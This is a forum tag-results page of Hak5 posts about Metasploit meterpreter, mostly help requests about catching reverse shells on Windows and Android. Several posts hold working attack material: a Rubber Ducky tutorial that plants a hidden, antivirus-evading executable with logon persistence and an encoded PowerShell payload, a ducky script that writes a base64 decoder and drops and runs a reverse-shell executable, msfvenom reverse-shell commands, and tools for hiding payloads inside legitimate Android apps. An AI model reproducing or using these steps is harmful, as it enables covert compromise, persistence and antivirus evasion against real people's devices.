Jump to content

Search the Community

Showing results for tags 'meterpreter'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. On the lan turtle I can catch multiple python/meterpreter/reverse_https sessions that are just dead on arrival. Am I doing something wrong?
  2. NOTE : THIS IS COMPLETELY FOR EDUCATIONAL PURPOSES AND I AM NOT TRYING TO HACK ANY DEVICE RIGHT NOW TO CREATE PROBLEM FOR SOMEONE .THE PHONE I AM TRYING TO EXPLOIT IS MY OWN SECOND DEVICE. I'm working with metasploit on TERMUX. So, My meterpreter session is open . I am able to access the SDCARD of the phone I am trying to exploit, but everytime I need to exploit the device, one needs to tap the app icon everytime for my meterpreter session to start. I want to create my payload persistent . So that, I don't have to wait for the user of the device to tap the icon again . So , I successfully created a bash file through "nano" which is named "syslogs.sh" and is placed in my sdcard. It works completely fine ; It contacts the device for my meterpreter session to start after a delay of every 20 seconds. So, I want to upload my syslogs.sh file from my SDCARD to sdcard of the device which I'm trying to exploit ; but it's just not happening!. I am getting an error like this >>>>> [-] 4 : Operation failed: 1 You can refer this image here . you can see here that I've also tried adding backslashes but it didn't seem to work. The location of my file is absolutely fine . If someone wants to exactly know what I'm trying to implement they can check this . I've honestly tried searching for solutions , I've seen previous solutions and posted my question on subreddits, stackoverflow, github but I'm not getting anything . I am really positive that you can guys can help me. I would highly appreciate ANY KIND OF SUGGESTION . I am absolutely new to this forum so if I've posted something wrong or I'm at a wrong place you can always let me know and I'll delete this post. Hoping for your replies.
  3. I'm pretty new to Metasploit but I have what appears to be a successful shell/session created however there is no prompt (normal commands return nothing) and I see that it shows only the default route (0.0.0.0:0) between my computer and the target. I did input my LHOST though it is a staged bind shell payload (inline payload shells produce the same result and meterpreter payloads don't work). Is it possible to obtain a full interactive shell? ======================================================================================================================================= msf5 exploit(windows/dcerpc/ms03_026_dcom) > run [*] 10.XX.XX.XX:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] 10.XX.XX.XX:135 - Binding to ZZ@ff_ip_tcp:10.XX.XX.XX[135] ... [*] 10.XX.XX.XX:135 - Bound to ZZ@ff_ip_tcp:10.XX.XX.XX[135] ... [*] 10.XX.XX.XX:135 - Sending exploit ... [*] Started bind TCP handler against 10.XX.XX.XX:135 [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.XX.XX.XX [*] Command shell session 1 opened (0.0.0.0:0 -> 10.XX.XX.XX:135) at 2020-07-21 14:50:17 -0600 background Background session 1? [y/N] y msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -i Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x86/windows 0.0.0.0:0 -> 10.XX.XX.XX:135 (10.XX.XX.XX) msf5 exploit(windows/dcerpc/ms03_026_dcom) >
  4. I dont get it.... Do I have to install meterpreter directly on the wifi pineapple or on another machine? #ssh Would be no problem, would have enen Raspberry Pi, on the Metasploit runs. But every time I enter on the API of the Pineapple Meterpreter Module the login data of my "Home Network-Raspberry Pi" nothing happens at all!
  5. Hi I'm reasonably new to using metasploit and can create a .apk with reverse shell without any issues but when I upload it on my test android running 8.1, it does not open a connection. It lets me install it but gives no option to open and when I click the icon, again nothing happens. I have tried signing the apk as well as binding it to an original application but still nothing. When I bound it to an original application, the app opened and the game worked but no connection was created. I have gave the individual apps the permissions to install from unknown sources too. Can anybody suggest what is wrong? Much appreciated...
  6. Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan)
  7. Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a ducky script and coded an executable which will achieve the title of this topic. This will make use of the twin duck firmware so this is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET framework 4.5 but PC's with Win 8+ will have this by default and loads of applications use this so the likelihood of a PC pre Win 8 not having it is fairly low (I might make a native payload later). What the executable does: - Checks for specific current privileges, e.g. Admin, Admin user group, non privileged user. - Depending on privilege level, either continue execution or attempt to elevate. (- If the user is in the admin user group it will display a normal UAC prompt so the ducky script we use later can hit 'ALT Y') - Copies itself and required DLL's to the default TEMP directory, and sets all of those files to be hidden. - Creates a hidden Task Scheduler task which runs the executable on each user logon. - Executes encoded Powershell payload. Why smart privilege checking is important: If a completely non privileged user was to execute the program and it asked for UAC anyway then a prompt like this would appear: This is obviously problematic, in this circumstance we would rather our payload run with normal privileges because non-privileged access is better than no access right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script so this prompt is never displayed and instead we get a normal user level meterpreter shell. Now if a user is part of the admin group then we see a dialog like this: This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use meterpreters 'getsystem' command and we're away! Tutorial: What you'll need: - Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft). - Linux based PC/VM for generating our payload/listening for connections. Preferably Kali Linux as we will be using S.E.T (Social Engineering Toolkit) to generate our Powershell payload. - USB Rubber ducky (with Twin Duck or similar firmware installed) - This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before) Let's start: - On the Kali Linux side of things lets open S.E.T by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'. - You will be presented with various options, hit '1' and then enter. - Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter. - More options, hit '1' and then enter. - Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding) - Give it a port and then say 'yes' when it asks if you want to start the listener. - Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/' - You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt' You should be faced with this screen: - Select all the text and copy it. - Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file: - Go to the line with the pre-inserted Powershell payload (Line 64): - Replace the text within the double quotes with your payload you got from the web server earlier. - Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them. - Navigate to the path it gives at the bottom in the console window to find the DLL's and exe file we need. - Plug in your Ducky's micro SD card into your PC, copy the files called 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' 'JetBrains.Annotations.dll' to your ducky drive. - Now we need our ducky payload, here is the code: REM Awesome script DELAY 500 GUI R DELAY 50 STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe" DELAY 50 ENTER DELAY 1500 ALT Y DELAY 1000 STRING exit DELAY 50 ENTER DELAY 50 STRING exit DELAY 50 ENTER - Generate your inject.bin file with an encoder. - Copy the inject.bin to your Ducky's drive and there we have it! Some caveats: - The 'PSExec.exe' file is totally undetected by AntiViruses but if an Anti virus wants to scan the file before running it, it may interfere with the ducky script. - Slower PC's may need slightly longer delays in the ducky script, but hey, just experiment until it works! So tell me what you think, feedback is greatly appreciated!
  8. Hi, I use a pinapple nano, with the last firmware. I would like to know how to add a code into the Evil Portal module to obtain a meterpreter session when the "victim" tries to authentificate? Someone could help me? Best regards, Michael
  9. Hey there! I am Luuk a 14 year old boy who's very intrested in cyber security. When I was little [smaller] ;] I always dream about being a cool hacker. Like 1 year ago I decided to start so i made a usb with kali linux on it and i learned the basics from metasploit [meterpreter payloads] I also discovered how to hide virus for a lot of av like windows defender. I also learned the basic commands of the terminal and working with armitage. But I have 1 problem ;[ Every time when i want to start a listener i make the payload like this msfvenom -p windows/meterpreter/reverse_tcp LHOST=tcp.ngrok.io LPORT=the port of ngrok -f exe > payload.exe So thats done and i wanted to start a listener. I open metasploit and type: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 127.0.0.1 set lport 80 exploit Ok so a few month's ago it would say started reverse handler ........ And it started to listen Now it says started reverse handler and a new line is opened. What!!! What's going on When i search the job with services its listening but when i type run {job nummer} it says did you wanted a reversebindlistenadress Failed to bind 127.0.0.1 failed to bind 0.0.0.0 So thats my problem oh. Extra note: I use ngrok for meterpreter over wan {i can't port forward for some reason} It would be great if i can get a answer thanks and happy hacking!
  10. Hello! I would like to ask if there is any way to use meterpreter directly from the bash bunny metasploit over wan after i infected a machine. And also if S. E. T is working :) Thanks in advance :)
  11. I have been trying to get a meterpreter session over WAN using a reverse tcp attack for a while now and i'm pretty stuck. My attack works fine on LAN and I have port forwarding set up to sent the session to my listener on port 4444. I can get a netcat session over WAN so i know the port forwarding is set up correctly but meterpreter doesn't seem to be receiving any connections. Any thoughts?
  12. blackcoat

    Meterpreter

    Fud backdoor with Pwnwinds with bat. format + Powershell is not connecting with metasploit listener.The backdoor was made by TheFatRat connection type :reverse https Attacked virtual box os type:windows 10
  13. Hello everyone, I am new here - this is very first post. I hope it's in the correct section! Anyway, the past week I have been wanting to port forward in order to be able to start an external session (get into meterpreter when the victim is not using my IP) However, it turns out that port forwarding isn't possible on IPV6 - in fact, it WOULD work if the victim uses IPV6 as well. I haven't confirmed that, anyway. ( please correct me if I am wrong here) My question is, is there any way to start a session as an IPV6 user, as in maybe an exploit that can do it? I usually use the multi/handler exploit, with the windows/meterpreter/reverse_tcp payload. (also tried reverse_ipv6_tcp) If someone can help me or respond to this thread I will highly appreciate it! Thank you!
  14. Hi guys, Anyone know how I can get shell access in using any modern browsers (Chrome, IE, Firefox, etc. so that the browser doesn't bitch at me and say I need to upgrade to latest browser version) by browsing to a URL? I tried putting a malicious iframe on my evil portal and using these exploits: auxiliary/server/browser_autopwn, auxiliary/server/browser_autopwn2. I even tried downgrading to IE 8 then using the exploit: exploit/windows/browser/ms10_002_aurora. But so far I got nothing. :( No meterpreter sessions. This is for a presentation, by the way. Any of you guys suggest a different way? I am desperate. Wait not really. Just really frustrated. Hope someone can help. Thanks in advance!
  15. bro i made a payload in metasploit by using ngrok without portforwarding so that i can go WAN...but in ngrok the port get changed everytime i open it...so ineed to make the payload again and again and send it to the victim...is there any way i can overcome this
  16. Im trying to exploit my rooted galaxy core prime which is vulnerable to the exploit/unix/x11/x11_keyboard_exec module. Im having a bit of trouble getting a shell. Ive got to the point where a session is created, but when i try to interact with the session to get a shelll it just stops and hangs and does nothing. Ive tried different payloads but the same thing happens everytime. It just says interacting with session <ID>, and I cant get any further than that. Any tips or help would be appreciated. And Im also a bit confused on configuring the reverse shell payload. is the LHOST supposed to be my IP or the victims in a reverse shell. plus what is the proper IP and port number for "ReverseListenerBindAddress" and "ReverseListenerBindPort? Thank you.
  17. Hi!! I get this error when I try to run the record_mic command y meterpreter session: Error running command record_mic: NoMethodError undefined method 'value' for nil: NilClass What I'm doing wrong? Thanks!!!
  18. I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
  19. hi! I'm trying to get into a Windows 10 64x computer in the same LAN than another 86x pc with Kali Linux. Once I finally get into the target pc (w10) and the meterpreter session is open, the meterpreter session command prompt doesn't appear, I mean, I don't get the meterpreter> command prompt... What I'm doing wrong? Thaks!!
  20. So I literally just finished copying this tutorial ... https://www.youtube.com/watch?v=fmRRX7-G4lc And everything went smoothly... Apart from when I plugged in the duck... Nothing happened on my Kali MSF... No shells were caught? I should first off mention that my target machine was actually a 64 bit windows, so i had to change the msfvenom -a to x64 and change the payload to windows/x64/meterpreter/reverse_tcp... But besides that everything went ok... So because the shell wasnt being caught, I decided to open up powershell my self, and manually type in the code that the ducky inject.bin is trying to run in powershell.... and i got this error... So I think the reason nothing happens when I plug the duck in, is because in the background (because obviously it is commanded to be hidden in the inject.bin) this is happening... making MSF not catch a shell... Please could anyone take a look at this and help me overcome this error please. I would be forever grateful! Thank you hak5 enthusiasts! <3
  21. Hello everyone, This weekend I got a little bored and began toying with Android payloads to just toy with a meterpreter shell to see how it is. Upon doing so, I noticed the payload generated from msfvenom required I ignore my AV to install. So this sent me down a path to bypass antivirus, which come to find out WAS EXTREMELY EASY! I began with apkwash, which simply takes the msfvenom generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only a ducky script could auto-download and install the payload that would make this awesome. Otherwise, you would need a couple minutes alone with their unlocked phone. Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way other than injecting the same AV bypassing payload into a legit app? Well, some people had example on how to do this online, but required a long process to manually do it all. Why not script it? Well, each app is different so this can be hit or miss so I allowed manual pieces for those special apps. The result was apkinjector, which with utilizing the apkwash technique of AV bypass is able to make a hidden payload inside another APK. Perfect! Now, the downfall to this is APKTool has issues with certain packages (Facebook, Starbucks, etc). I have had success injecting into about 70-80% of .apk files. Github: https://github.com/jbreed/apkwash https://github.com/jbreed/apkinjector
  22. I was a little curious about the PrependMigrate option for meterpreter. I was trying to migrate to iexplore.exe or MicrosoftEdge.exe. But I'm not sure how to set the PrependMigrateProc option when generating my payload. I'm mostly confused on the path for the program I want to migrate to. If I use the program name it just doesn't work. When I use the full path it throws a different error like my syntax is wrong. Any ideas? msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 PrependMigrate true PrependMigrateProc "C:\Program Files\Internet Explorer\iexplore.exe" --platform win HOPURL=http://192.168.1.10/hop.php EXTENSIONS=stdapi,priv -f raw -o /root/Desktop/radpayload.raw
  23. Hi, I've been trying to upload a .vbs file to a remote machine in a meterpreter session without success. This problem also occurs with .exe files so it's not the .vbs file type not being supported. I've tried this: upload root/Desktop/program.vbs c:\\Users\\i7479\\Desktop This returns: [-] Error running command upload: Errno:ENOENT No such file or directory @ rb__file_s__stat - root/Desktop/program.vbs The paths for these files are both correct, it just can't find the program to be uploaded... Does anyone know how to carry this out? Should such a basic command be so tricky to execute? This doesn't work on Armitage (GUI) either btw...
  24. So I have seen people having issues with doing a download of a meterpreter payload and getting it to run from the ducky. I went for a different approach. I decided to try to modify this script from the wiki (i think darren did a segment on it) in a different way. Here is what I came up with. Create the exe from msfvenom with the parms to connect the the metasploit handler Encode the exe with base64 Edit the encoding to be duckyfied Append the duckyfied encoded exe to met.txt Append last.txt to met.txt Duckyencoder to make the inject.bin Place on ducky sdcard ... win msfvenom -a x86 --platform windows \ -p windows/meterpreter/reverse_tcp \ LHOST=IP_ADDRESS \ LPORT=PORT \ PREPENDMIGRATE=true \ PREPENDMIGRATEPROC=notepad.exe \ ReverseConnectRetries=20 \ -b '\x00' \ -e x86/shikata_ga_nai \ -f exe |\ base64 > bad_exe.txt sed -e 's/^/STRING /' -e '/STRING/ a ENTER' bad_exe.txt >> met.txt cat last.txt >> met.txt java -jar encoder.jar -i met.txt -o inject.bin Contents of met.txt ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\bad_exe.txt ENTER Contents of last.txt CTRL z ENTER STRING cscript c:\decoder.vbs c:\bad_exe.txt c:\bad.exe ENTER STRING c:\bad.exe ENTER STRING exit ENTER
  25. Hi.......i have a problem, hope somebody can help me! Ok,....... I have created a Reverse TCP DNS payload with MSFVenom...... Now i want to execute this File with plugging in the USB Rubber Ducky! How i got to do this? Do i have to convert my Payload with Base64? And if yes, how i could do this? Please help me!
×
×
  • Create New...